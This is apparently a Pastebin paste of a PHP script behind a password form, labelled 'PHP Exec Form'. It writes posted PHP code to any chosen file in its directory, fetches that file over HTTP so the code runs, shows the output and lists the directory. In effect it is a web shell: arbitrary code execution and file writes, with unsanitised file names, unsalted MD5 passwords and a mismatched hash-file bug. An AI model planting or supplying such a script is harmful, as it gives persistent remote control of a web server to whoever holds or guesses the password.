Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- ob_start();
- $logform =<<<INF
- <form action="{$_SERVER["PHP_SELF"]}" method="post" name="logform"
- enctype="application/www-form-urlencoded">
- <fieldset>
- <legend>input auth code</legend>
- <label for="password">input password</label>
- <input type="text" name="password" />
- <input type="submit" name="submit" value="submit" />
- </fieldset>
- </form>
- INF;
- $fname4 = isset($_POST["fname"])?$_POST["fname"]:'test.php';
- $phptext4 = isset($_POST["phptext"])?$_POST["phptext"]:'text...';
- $load4 = isset($_POST["load"])?"checked":"";
- function php_inform() {
- global $fname4;
- global $phptext4;
- global $load4;
- $php_inpform = <<<INF
- <script type="text/javascript">
- function checkpos(el) {
- var zdiv = document.getElementById("posdiv");
- }
- </script>
- <form action="{$_SERVER["REQUEST_URI"]}" method="post" name="phpform"
- enctype="application/www-form-urlencoded" >
- <fieldset>
- <legend>PHP Exec Form</legend>
- <label for="fname">Input file name</label>
- <input type="text" name="fname" value="{$fname4}" />
- <p>Input PHP text</p>
- <textarea name="phptext" rows="40" cols="100">{$phptext4}</textarea>
- <br />
- <input type="submit" name="submit" value="submit" /> Load
- <input type="checkbox" name="load" {$load4} />
- <div id="posdiv"></div>
- </fieldset>
- </form>
- INF;
- return $php_inpform;
- }
- session_start();
- if (isset($_GET["reset"])) {
- session_destroy();
- ob_clean();
- header('Location: '.$_SERVER["PHP_SELF"]);
- }
- if (!isset($_SESSION["logged"]))
- logon();
- else
- php_execform();
- //---------------------------------------
- function logon() {
- global $logform;
- if (isset($_POST["submit"])) {
- if (@$_POST["createpass"]==true) {
- $fh = fopen(dirname(__FILE__).DIRECTORY_SEPARATOR.'hash8.txt', 'w');
- fwrite($fh,md5($_POST["password"]));
- fclose($fh);
- echo "password created";
- exit();
- }
- $pass=md5($_POST["password"]);
- $fh = fopen(dirname(__FILE__).DIRECTORY_SEPARATOR.'hash.txt','r');
- $s=fread($fh, 1024);
- fclose($fh);
- if ($pass!=$s) {
- echo "invalid password<br/>";
- echo "<a href=\"{$_SERVER["REQUEST_URI"]}\" />back</a>";
- }
- else
- {
- $_SESSION["logged"]=true;
- ob_clean();
- header('Location:'.$_SERVER["PHP_SELF"]);
- }
- }
- else {
- echo $logform;
- }
- }
- //---------------------------------------
- function php_execform() {
- $fn=dirname(__FILE__).'/'.(isset($_POST["fname"])?$_POST["fname"]:'test.php');
- $fnz = 'http://'.$_SERVER["SERVER_NAME"].
- substr($_SERVER["SCRIPT_NAME"],0,strrpos($_SERVER["SCRIPT_NAME"],'/')+1).
- (isset($_POST["fname"])?$_POST["fname"]:'test.php');
- if (isset($_POST["submit"]) ) {
- if (!isset($_POST["load"])) {
- echo 'write file<br/>';
- $fh = fopen($fn,'w');
- fwrite($fh, $_POST["phptext"]);
- fclose($fh);
- }
- else
- {
- global $phptext4;
- $phptext4=file_get_contents($fn);
- }
- }
- echo '<div style="float:left;width:900px;">';
- echo php_inform();
- echo '</div><div style="margin-left:900px;background-color:#eee;">';
- echo $fnz.'<hr>';
- echo file_get_contents($fnz);
- echo '</div><div style="margin-top=10px;background-color:#ffe;margin-left:900px;">';
- $fh = fopen ($fn, 'r');
- $i=1;
- $strz='';
- while ($row= fgets($fh)) {
- $row=htmlentities($row);
- $strz.= $i.' '.$row;
- $i++;
- }
- echo '<pre>'.$strz.'</pre></div><div style="margin-top=10px;margin-left:900px;">';
- $d= opendir('.');
- while ($f=readdir($d)) {
- if (is_file($f)) {
- echo $f.' '.date('d.m.Y H:i:s',filemtime($f)).' '.filesize($f).'<br />';
- }
- }
- echo '</div>';
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement